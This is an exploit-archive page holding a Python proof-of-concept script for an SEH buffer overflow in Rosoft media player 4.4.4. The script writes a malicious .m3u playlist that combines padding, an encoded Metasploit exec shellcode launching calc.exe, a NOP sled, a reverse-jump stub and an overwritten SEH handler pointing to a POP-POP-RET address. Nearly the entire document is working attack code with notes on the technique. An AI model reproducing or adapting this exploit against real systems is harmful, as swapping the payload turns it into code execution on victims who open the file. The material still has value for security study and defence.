Rosoft media player 4.4.4 SEH Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Rosoft media player 4.4.4 SEH Buffer Overflow
# Published : 2010-08-15
# Author : dijital1
# Previous Title : MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit
# Next Title : A-PDF WAV to MP3 Converter 1.0.0 (.m3u) Stack Buffer Overflow
#!/usr/bin/python

# #######################################################################
# Title:                Rosoft media player 4.4.4 SEH buffer overflow
# Date:                 August 15, 2010
# Author:               dijital1 
# Original Advisory:    http://www.exploit-db.com/exploits/14601 - abhishek lyall
# Download:             http://www.exploit-db.com/application/14601/
# Platform:             Windows XP SP3 EN Professional - VMware
# Greetz to:            Corelan Security Team, Exploit-db, OffSec
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #######################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code. 
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
 
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "   -= Exploit for Rosoft media player 4.4.4 (SEH) - dijital1 =-     "


outputfile="exploit.m3u"


junk="x41"*3470

nseh="xebx88x90x90" #reverse jump 118 bytes

seh="x49xd4x46x00" # PPR - 0046D449 - Taken from the exe. The null byte terminates 
		               # the copy but because we have a big area to work with prior to
                       # to reaching the SEH, this exploit is still possible.


# The following shellcode makes use of the GetPC technique for copying EIP into ECX.
# ECX is then adjusted to move execution 775 bytes earlier in the buffer. We need to
# to jump back further than what a short jump will allow hence the following...
#
# Referenced: phrack #62 Article 7 Originally written by Aaron Adams
#
# msfencode -i ./768bck.bin -e x86/alpha_upper -t c
# [*] x86/alpha_upper succeeded with size 107 (iteration=1)

revjump=("x89xe7xdbxd7xd9x77xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4ex39x4ax4ex49x49x43x44"
"x51x34x4cx34x50x59x4bx30x4fx31x44x4ax4ax30x4b"
"x4ex48x4dx4bx4ex48x4dx4bx4ex48x4dx4bx4fx4dx31"
"x41x41")

# NOP sled between the main payload and the reverse jump shellcode
sled="x90"*60


# msfpayload windows/exec CMD=calc.exe R | ./msfencode -e x86/alpha_upper -t c
# [*] x86/alpha_upper succeeded with size 471 (iteration=1)
shellcode=("x89xe5xdbxc5xd9x75xf4x58x50x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4bx58x4bx39x45x50"
"x45x50x45x50x43x50x4dx59x4bx55x46x51x49x42x45"
"x34x4cx4bx51x42x46x50x4cx4bx50x52x44x4cx4cx4b"
"x50x52x42x34x4cx4bx43x42x47x58x44x4fx4fx47x50"
"x4ax47x56x46x51x4bx4fx50x31x4fx30x4ex4cx47x4c"
"x43x51x43x4cx45x52x46x4cx47x50x4fx31x48x4fx44"
"x4dx45x51x4fx37x4bx52x4ax50x51x42x50x57x4cx4b"
"x51x42x44x50x4cx4bx51x52x47x4cx43x31x4ex30x4c"
"x4bx51x50x42x58x4dx55x4fx30x42x54x50x4ax43x31"
"x48x50x50x50x4cx4bx47x38x42x38x4cx4bx51x48x47"
"x50x43x31x4ex33x4ax43x47x4cx50x49x4cx4bx50x34"
"x4cx4bx43x31x48x56x50x31x4bx4fx46x51x49x50x4e"
"x4cx4fx31x48x4fx44x4dx43x31x4fx37x46x58x4bx50"
"x43x45x4ax54x44x43x43x4dx4bx48x47x4bx43x4dx47"
"x54x42x55x4dx32x50x58x4cx4bx51x48x51x34x43x31"
"x49x43x45x36x4cx4bx44x4cx50x4bx4cx4bx51x48x45"
"x4cx45x51x48x53x4cx4bx45x54x4cx4bx45x51x48x50"
"x4cx49x50x44x47x54x47x54x51x4bx51x4bx45x31x46"
"x39x51x4ax50x51x4bx4fx4bx50x50x58x51x4fx50x5a"
"x4cx4bx42x32x4ax4bx4dx56x51x4dx43x5ax43x31x4c"
"x4dx4cx45x48x39x45x50x45x50x45x50x46x30x42x48"
"x50x31x4cx4bx42x4fx4bx37x4bx4fx49x45x4fx4bx4a"
"x50x48x35x4fx52x46x36x45x38x49x36x4ax35x4fx4d"
"x4dx4dx4bx4fx4ex35x47x4cx45x56x43x4cx44x4ax4d"
"x50x4bx4bx4bx50x42x55x44x45x4fx4bx47x37x44x53"
"x44x32x42x4fx42x4ax43x30x46x33x4bx4fx49x45x45"
"x33x45x31x42x4cx42x43x46x4ex42x45x44x38x43x55"
"x45x50x45x5ax41x41")


payload=junk+shellcode+sled+revjump+nseh+seh

FILE = open(outputfile, "w")
FILE.write(payload)
FILE.close()


print "nExploit written to: " + outputfile + "n"